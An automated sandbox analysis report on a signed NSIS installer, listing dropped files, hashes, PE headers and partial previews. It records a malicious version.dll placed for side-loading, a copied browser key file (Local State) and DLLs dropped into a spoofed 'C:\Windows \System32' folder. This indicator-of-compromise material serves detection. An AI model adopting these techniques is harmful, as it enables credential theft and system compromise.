                                                                                                                                                                                            Preview:L..................F.... ........G......G....6..?...BA.......................:..DG..Yr?.D..U..k0.&...&......vk.v....X...G......G......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y)............................%..A.p.p.D.a.t.a...B.P.1......Y@...Local.<......CW.^.Y@.....b.........................L.o.c.a.l.....Z.1......Y/...Programs..B......Y...Y/.............................'.P.r.o.g.r.a.m.s.....N.1......Y@...NSIS..:......Y/..Y@............................1..N.S.I.S.....Z.2..BA.zY.! .NSIS.exe..B......Y;..Y;....._.........................N.S.I.S...e.x.e.......b...............-.......a............[.......C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe........\.....\.....\.....\.....\.....\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.N.S.I.S.\.N.S.I.S...e.x.e.............:...........|....I.J.H..K..:...`.......X.......287400...........hT..CrF.f4... ..k......,.......hT..CrF.f4... ..k......,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2198952
                                                                                                                                                                                            Entropy (8bit):6.563177058140165
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:f0eL6aJyxz8eGSfmOifv0LkifQvl9Hu1QEBWfzbnWKNSq:seLWz8TSfmxfv05Qvl9Hu1fBWfzbnWs
                                                                                                                                                                                            MD5:3AEF228FB7EE187160482084D36C9726
                                                                                                                                                                                            SHA1:8B76990C5061890C94F81F504C5782912A58D8A6
                                                                                                                                                                                            SHA-256:C885DF88693496D5C28AD16A1ECDE259E191F54AD76428857742AF843B846C53
                                                                                                                                                                                            SHA-512:E659A7CF12C6B41879E4CE987E4CD1CEFCE2FFC74E06817667FA833764F36F25CC5F8374DBC844B68B787ACAC011C7B8C8F2B74563BF8A96F623EBB110A593DA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ck.'...'...'...lr..<...lr......lr......lr..&...q..3...q..0...q..K...lr......'...D...q..&...q..4...qp.&...'...&...q..&...Rich'...........PE..L...7..c.........."....!.\...................p....@..........................@".....h.!...@..........................................@...............f!..'.... .h%..pw..T....................x.......v..@............p..D............................text...<Z.......\.................. ..`.rdata..R....p.......`..............@..@.data........@...Z..."..............@....rsrc........@.......|..............@..@.reloc..h%.... ..&...@..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\MyElectronApp\data.bin

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):478262
                                                                                                                                                                                            Entropy (8bit):6.641750483832833
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:smYR2v42TPWRk/LBFn6FnelvxRXYQ9WgRuFoj4BEanaMT:u2l6R4V6p49RuFojf6aS
                                                                                                                                                                                            MD5:71EE48D05DCAAF3EDC86C7A8DDC7CFD8
                                                                                                                                                                                            SHA1:9448DAE20207994597047D2796F3E237CA76B287
                                                                                                                                                                                            SHA-256:4776212795CA4946FA4AAD57DF8EE4FB4A4D966CF23FBA6A47AC18B3D8B73B52
                                                                                                                                                                                            SHA-512:814B4456A04D07662888BF35D5F6D40B2CC5938D9EBF77F597D113EF2CAD62C6BAAE9ED9C36765F8DA4FB37A848443A29632F090AD42DAA50AD44EA766A138C1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:B.....'*.....B...)n.i...U/q..#l.d'.. ............. ......z...j..x)j..zA..z...j..x)B..zA.......u.........i..j.i.#O)F.........!.#.V!.V!.#.Rm.V....!.R!.#.V!.V/U.)...'.!.j...'...)...R'...#RB.UUU/j.!....|..j.#F.i#Z..#F.i.#O+Fz....!..!.)..'.#.R..j.#F.i)......_...!..r)..#.V..N...A.!.V!..t ..q."r#X''.UUU'...2..#. .)k..j.[.j.q..*....S.c'..UUU.#&.UUUBPTUU/j.!./q.!..!..Uz#i/q....!.V)....!.!.V!.#.m....!.l.m!./j.....!.!...U{A.!..!.'.!....Ux/j..^...)l.#.!.)m./j.b!.V!..)j.)..#.V./.UUU!.R#r..#.V......).&..........!."....t)....<...!.)E.{E'..m.R..../U..'.....#b.U......kC...c.r./c..)S..!.VkC...A.)S...!.V..A.)S..!.V..A.)S.....!.V'&..*..!..kC...)h.!.R.)h.#.R.R.%..).../.UUU........#F.i...j.#F.i.#O)F.!.'..#.R!....#r/c.!..t: ..".../c._!.R!.c'......m.V........!.!.V!...s/\. ..".../\._+......!.R!.V...'.^.!....!..U{/j.!.R!.V....)m.#.V.b.........#F.i..j.#F.i.#O)F./\.!./c.!.!...#.B/x..j#F.i..!..!.!....].Z#.Z!.Z#.F#b.XkB.#.^

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\MyElectronApp\version.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):262144
                                                                                                                                                                                            Entropy (8bit):7.040362388355635
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:1YY/D4hH334/EDRom7sMD+ztiU6YW9+cYjb0w7C+TS4idLekmS:1YYkhYeRoHt8U6xwcmb0wr1S
                                                                                                                                                                                            MD5:B9C1E07B4B2EDA5D3650ACAD008B8374
                                                                                                                                                                                            SHA1:5F193013D0F9CAA41E1A1B2441E5E969315803C7
                                                                                                                                                                                            SHA-256:A94785C2269DA10BC56B8B2D526E6028B22D62D0961DB3129ABC0208416C119E
                                                                                                                                                                                            SHA-512:67EFFA650CEB69AFBE040385F017F22BA270AB04AB7CF9AB5B2A64F4D0ECB6D6F29809BD49EE9C9F0AD42D9BFBAB595F213FB276259D62F8C48D97431AFD0708
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....IEg...........!.....z..........!........................................`............@.........................@...R.......(....0.......................@..@...x............................... ...................$............................text....x.......z.................. ..`.rdata...`.......b...~..............@..@.data...H...........................@....00cfg....... ......................@..@.rsrc........0......................@..@.reloc..@....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\NSIS\96bb0927-c8fc-4b92-b437-4bdcaebd24d1.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):434
                                                                                                                                                                                            Entropy (8bit):5.666974645428673
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:YKWSCuj9rrt+dmGikM5VtMRng3BJx9XoAnNgn:YKWJu5rrtqRMSMx94AnNM
                                                                                                                                                                                            MD5:88D093A2D444CF5DFDEDA96845BFC984
                                                                                                                                                                                            SHA1:F140EDE9420A379CBB7B11BAFA516D21B8F64CE0
                                                                                                                                                                                            SHA-256:6EFEE9C84AA2368E49CE920AEA5A7B5FB80BEC99AB9A41B895BAF202945C764D
                                                                                                                                                                                            SHA-512:A28B453336B955583C8181AF30E8E69ADC33D18674A94DAF8B921252B84AC2BF422D1EAEEE023A161200E0E189B25682265D65F6684D25C7B407EC41AC088BBC
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAD0xoH2Msy0SIYdC+FIYwlNEAAAABIAAABDAGgAcgBvAG0AaQB1AG0AAAAQZgAAAAEAACAAAADsTfzAZ58kT+Faog1LeUGcM0qWp/fmiIznVy2lCJvbtgAAAAAOgAAAAAIAACAAAAAfOPl60Rs+SIhCtqMCp3prPDeAqHoPa/hg3o38FcSNSTAAAACFbLZf/hxC0vXsO7OZusr2OTJ71MhJl4jD+S9tuK8AAw2+2HMc3bsUWk/4iC10Y7RAAAAAJi4ZTHhtV+FZOfzt6lhQFUEcIu7AQ2i9QLZAcRWVm8Mq1g+oUoIsPHh+DTHpOwuaeWnq/0FVbvreF6/3oI11VA=="}}

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\NSIS\Local State (copy)

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):434
                                                                                                                                                                                            Entropy (8bit):5.666974645428673
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:YKWSCuj9rrt+dmGikM5VtMRng3BJx9XoAnNgn:YKWJu5rrtqRMSMx94AnNM
                                                                                                                                                                                            MD5:88D093A2D444CF5DFDEDA96845BFC984
                                                                                                                                                                                            SHA1:F140EDE9420A379CBB7B11BAFA516D21B8F64CE0
                                                                                                                                                                                            SHA-256:6EFEE9C84AA2368E49CE920AEA5A7B5FB80BEC99AB9A41B895BAF202945C764D
                                                                                                                                                                                            SHA-512:A28B453336B955583C8181AF30E8E69ADC33D18674A94DAF8B921252B84AC2BF422D1EAEEE023A161200E0E189B25682265D65F6684D25C7B407EC41AC088BBC
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAD0xoH2Msy0SIYdC+FIYwlNEAAAABIAAABDAGgAcgBvAG0AaQB1AG0AAAAQZgAAAAEAACAAAADsTfzAZ58kT+Faog1LeUGcM0qWp/fmiIznVy2lCJvbtgAAAAAOgAAAAAIAACAAAAAfOPl60Rs+SIhCtqMCp3prPDeAqHoPa/hg3o38FcSNSTAAAACFbLZf/hxC0vXsO7OZusr2OTJ71MhJl4jD+S9tuK8AAw2+2HMc3bsUWk/4iC10Y7RAAAAAJi4ZTHhtV+FZOfzt6lhQFUEcIu7AQ2i9QLZAcRWVm8Mq1g+oUoIsPHh+DTHpOwuaeWnq/0FVbvreF6/3oI11VA=="}}

                                                                                                                                                                                            C:\Windows \System32\version.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):226816
                                                                                                                                                                                            Entropy (8bit):6.641421803992435
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:6BrX/YVAjaKHMVJcjt4FyZTYTC1leMllGbmPVMpJv:6B7XmFJQtHZTkojllGbmPVMj
                                                                                                                                                                                            MD5:66DE65D980D40F3AAAC3DA64BE631A91
                                                                                                                                                                                            SHA1:E9DB45421829AADF312EE888F5340ADE4545AF89
                                                                                                                                                                                            SHA-256:1CB9FCC2D76F51DBD08D58209C3E732B1ABD0C1C0A3760D95374C68C890FF010
                                                                                                                                                                                            SHA-512:FA8BC38B7C5D663497C1798A292D75F768D528CFE272F23C1CC3A4CDAE80229772832BD45B54D2CE1815D347C941371EB87B84DCC794EAAE515109F5B71F2FB4
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...+IEg.........." ......................................................................`.........................................P+..R....0..(............p..................H...p*.............................. ...@............3..H............................text...X........................... ..`.rdata..............................@..@.data...p....P.......8..............@....pdata.......p.......D..............@..@.00cfg..8............V..............@..@.gxfg...p............X..............@..@.retplne.............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc..H............n..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Windows \System32\winSAT.exe

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2810880
                                                                                                                                                                                            Entropy (8bit):6.3690794133732
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:0Mn9l8jZuRDTmPjRI2/MVAptUKDdKKYmq1dKwdfU2bECbe:pKjObbbH1DFE/
                                                                                                                                                                                            MD5:FC2414F108B613366BDE7AE897AB53A1
                                                                                                                                                                                            SHA1:ACEC8C7A1C2535963E11151D3FFE68921FA82625
                                                                                                                                                                                            SHA-256:D25B452CCC0FE3A5E39B9BAECD913AFD15758428B52B0C1F50AC85ACA2D3405A
                                                                                                                                                                                            SHA-512:F6D2D8463EAD453131ECD18C61EE8F1D88094A54E42A4F158532B3A6BAB1D7DEA02BDC2CDD8C31975C932CAE43528FF8FDBE20D60E3EDB38C1E3B7073E13EC54
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7...s.u.s.u.s.u.g.v.v.u.g.q.d.u.g.t.X.u.s.t...u.g.}...u.g.p.m.u.g.r.u.g.w.r.u.Richs.u.........................PE..d....."..........".................`Y.........@..............................+......s+...`................................................. ...|............@..pq............+.....0$..T.......................(....................................................text............................... ..`PAGELK...!.......".................. ..`.rdata..,...........................@..@.data...hh..........................@....pdata..pq...@...r...Z..............@..@.rsrc...............................@..@.reloc........+.. ....*.............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Windows\Performance\WinSAT\winsat.log

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows \System32\winSAT.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):1257
                                                                                                                                                                                            Entropy (8bit):5.097274643567763
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:qlXPWlE1ZkX1hXoG7GVz/dIXHiIXd6r61l6oG7GVz/dk6HiR6Sc1c1zcoG7GVz/a:qNOEo1hXb7GVziXHiIXd6r61l6b7GVzH
                                                                                                                                                                                            MD5:FD769BD71900B50DC40A561347A5FAC6
                                                                                                                                                                                            SHA1:7001C2288DE78F69AC96FC1DD2D8A04870412D1E
                                                                                                                                                                                            SHA-256:9034E6CC2F599F0C880F9E914AF2E6A9618D461071DC7132447F7C2458B3E3FA
                                                                                                                                                                                            SHA-512:A89D73FAF623D78BF0A3D0195E4C90797791BA6F1D988A5002B609AF421EDA55204473041CF5C0AEC5812F3CD29D94FEDCF848239564DCB8A9E0DE130F0F36BF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:6906765 (7456) - exe\logging.cpp:0841: --- START 2024\12\6 11:34:07 ---..6906796 (7456) - exe\main.cpp:4044: WinSAT regisrty key missing - create the winsat key..6906796 (7456) - exe\main.cpp:4363: WinSAT registry node is created or present..6906812 (7456) - exe\processwinsaterror.cpp:0319: Writing exit code, cant msg and why msg to registry ..6906812 (7456) - exe\main.cpp:2767: > Not necessary to reenable EMD cache...6906812 (7456) - exe\main.cpp:5040: > exit value = 4.....6910281 (2700) - exe\logging.cpp:0841: --- START 2024\12\6 11:34:10 ---..6910296 (2700) - exe\main.cpp:4363: WinSAT registry node is created or present..6910312 (2700) - exe\processwinsaterror.cpp:0319: Writing exit code, cant msg and why msg to registry ..6910312 (2700) - exe\main.cpp:2767: > Not necessary to reenable EMD cache...6910328 (2700) - exe\main.cpp:5040: > exit value = 4.....6921640 (1028) - exe\logging.cpp:0841: --- START 2024\12\6 11:34:22 ---..6921640 (1028) - exe\main.cpp:4363: WinSAT registry node i

                                                                                                                                                                                            \Device\Null

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (427)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1037
                                                                                                                                                                                            Entropy (8bit):5.140269706556241
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:4DFfZRfZe9ecyfrt5YfrYtebE/xmQoNcckXoex:6Zbe9ec+8ESEJmQTH
                                                                                                                                                                                            MD5:EADFF4AE0D1BCDEBF449FF83ECA033C9
                                                                                                                                                                                            SHA1:40F25CDA266E69A7439981A61C3A82CA3470C68E
                                                                                                                                                                                            SHA-256:D3F853499FB0F4924F409B56A9AD8F2F3F822922039AE735BF2749FC9A70C1D3
                                                                                                                                                                                            SHA-512:BE4F56F4EB178A15A4C738B85D4D442E3266D01BD2BFBAD82694C0A7A408AEEA72CC6BD34FFF1AC8050FA4CE063C20C731C39EB6868192C0F92FD238C6503665
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:(node:3444) UnhandledPromiseRejectionWarning: Error: EBUSY: resource busy or locked, copyfile 'C:\Users\user\AppData\Local\Temp\aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dll' -> 'C:\Users\user\AppData\Roaming\MyElectronApp\version.dll'. at Object.copyFileSync (node:fs:3034:11). at Object.func [as copyFileSync] (node:electron/js2c/node_init:2:2786). at _0x16a65f (C:\Users\user\AppData\Local\Programs\NSIS\resources\app.asar\main.js:1:2809). at C:\Users\user\AppData\Local\Programs\NSIS\resources\app.asar\main.js:1:4107.(Use `NSIS --trace-warnings ...` to show where the warning was created).(node:3444) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). To terminate the node process on unhandled promise rejection, use the CLI flag `--unhandled-rejections=strict` (see https://nodejs.org/api/cli.html#cli_unhandled

                                                                                                                                                                                            Static File Info

                                                                                                                                                                                            General

                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                            Entropy (8bit):7.9998566203055415
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                            File name:YoS6ZBCcUy.exe
                                                                                                                                                                                            File size:84'269'376 bytes
                                                                                                                                                                                            MD5:9e19fd2499e9ffb9ca4eab08d9054a86
                                                                                                                                                                                            SHA1:198946086afa2544e8f86463f15fa321aa45f7e0
                                                                                                                                                                                            SHA256:7fedcec3a38dec8650ae2f64271b19c01372881ce83f1fe4597f85b26c4a0732
                                                                                                                                                                                            SHA512:e4e9cefb633a191f9e562a1fcf4176121b31f69f1d528a3505f381584c5d6c9100982de28684307cfabac7461a173dfd6a12d5d685dffb449d60cba209053d4e
                                                                                                                                                                                            SSDEEP:1572864:Vl2/ebAbW6FLl4oabh+XJhXhQiB1dJdYVkq7U4hmfixRR:VJ0bthlXOh01VJY+qw0ui3R
                                                                                                                                                                                            TLSH:4A0833792642C1B2F23C1AF4A7D367F7008A7E3B4FC5199822DC71F896721A112ED56B
                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h...8...@.

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:06233b25a3930321

                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                            General

                                                                                                                                                                                            Entrypoint:0x40338f
                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                            Time Stamp:0x5C157F86 [Sat Dec 15 22:26:14 2018 UTC]
                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                            Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                            Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                                                            Signature Validation Error:A certificate was explicitly revoked by its issuer
                                                                                                                                                                                            Error Number:-2146762484
                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                            • 15/11/2024 01:39:25 14/11/2025 04:40:09
                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                            • OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization, CN="Hebei Yibi Solidification Technology Co., Ltd.", SERIALNUMBER=91130681MA07QJYB30, O="Hebei Yibi Solidification Technology Co., Ltd.", L=Baoding, S=Hebei, C=CN
                                                                                                                                                                                            Version:3
                                                                                                                                                                                            Thumbprint MD5:D414BD8A03F75F33F20FADA661B4E3A3
                                                                                                                                                                                            Thumbprint SHA-1:50363EFD8A97C55148C5D130D3C5E68FEBC747BA
                                                                                                                                                                                            Thumbprint SHA-256:DEBC0E4F830C1427DC30D47B7F87D4C5F82C9A4422B1ADD85CE9DE26E72CAEA6
                                                                                                                                                                                            Serial:17AECDF77E844F5C7B34DF5B8FE14BEE

                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                            Instruction
                                                                                                                                                                                            sub esp, 000002D4h
                                                                                                                                                                                            push ebx
                                                                                                                                                                                            push esi
                                                                                                                                                                                            push edi
                                                                                                                                                                                            push 00000020h
                                                                                                                                                                                            pop edi
                                                                                                                                                                                            xor ebx, ebx
                                                                                                                                                                                            push 00008001h
                                                                                                                                                                                            mov dword ptr [esp+14h], ebx
                                                                                                                                                                                            mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                                            mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                            call dword ptr [004080A8h]
                                                                                                                                                                                            call dword ptr [004080A4h]
                                                                                                                                                                                            and eax, BFFFFFFFh
                                                                                                                                                                                            cmp ax, 00000006h
                                                                                                                                                                                            mov dword ptr [0047AEECh], eax
                                                                                                                                                                                            je 00007F9A252C3743h
                                                                                                                                                                                            push ebx
                                                                                                                                                                                            call 00007F9A252C69F5h
                                                                                                                                                                                            cmp eax, ebx
                                                                                                                                                                                            je 00007F9A252C3739h
                                                                                                                                                                                            push 00000C00h
                                                                                                                                                                                            call eax
                                                                                                                                                                                            mov esi, 004082B0h
                                                                                                                                                                                            push esi
                                                                                                                                                                                            call 00007F9A252C696Fh
                                                                                                                                                                                            push esi
                                                                                                                                                                                            call dword ptr [00408150h]
                                                                                                                                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                            cmp byte ptr [esi], 00000000h
                                                                                                                                                                                            jne 00007F9A252C371Ch
                                                                                                                                                                                            push 0000000Ah
                                                                                                                                                                                            call 00007F9A252C69C8h
                                                                                                                                                                                            push 00000008h
                                                                                                                                                                                            call 00007F9A252C69C1h
                                                                                                                                                                                            push 00000006h
                                                                                                                                                                                            mov dword ptr [0047AEE4h], eax
                                                                                                                                                                                            call 00007F9A252C69B5h
                                                                                                                                                                                            cmp eax, ebx
                                                                                                                                                                                            je 00007F9A252C3741h
                                                                                                                                                                                            push 0000001Eh
                                                                                                                                                                                            call eax
                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                            je 00007F9A252C3739h
                                                                                                                                                                                            or byte ptr [0047AEEFh], 00000040h
                                                                                                                                                                                            push ebp
                                                                                                                                                                                            call dword ptr [00408044h]
                                                                                                                                                                                            push ebx
                                                                                                                                                                                            call dword ptr [004082A0h]
                                                                                                                                                                                            mov dword ptr [0047AFB8h], eax
                                                                                                                                                                                            push ebx
                                                                                                                                                                                            lea eax, dword ptr [esp+34h]
                                                                                                                                                                                            push 000002B4h
                                                                                                                                                                                            push eax
                                                                                                                                                                                            push ebx
                                                                                                                                                                                            push 00440208h
                                                                                                                                                                                            call dword ptr [00408188h]
                                                                                                                                                                                            push 0040A2C8h

                                                                                                                                                                                            Rich Headers

                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                            Data Directories

                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x19f0000x2dce0.rsrc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x505bb200x1e20
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                            Sections

                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                            .text0x10000x66270x68007618d4c0cd8bb67ea9595b4266b3a91fFalse0.6646259014423077data6.450282348506287IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .rdata0x80000x14a20x1600eecac1fed9cc6b447d50940d178404d8False0.4405184659090909data5.025178929113415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .data0xa0000x70ff80x600db8f31a08a2242d80c29e1f9500c6527False0.5182291666666666data4.037117731448378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            .ndata0x7b0000x1240000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            .rsrc0x19f0000x2dce00x2de00cfd476f8d586ce1dc6fbec584304b016False0.2245348688692098data4.893020464003984IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                            Resources

                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                            RT_ICON0x19f6280x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.08976103158641903
                                                                                                                                                                                            RT_ICON0x1afe500x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.13509039310489804
                                                                                                                                                                                            RT_ICON0x1b92f80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.16344731977818855
                                                                                                                                                                                            RT_ICON0x1be7800x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.16786726499763815
                                                                                                                                                                                            RT_ICON0x1c29a80x417fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9886085763702511
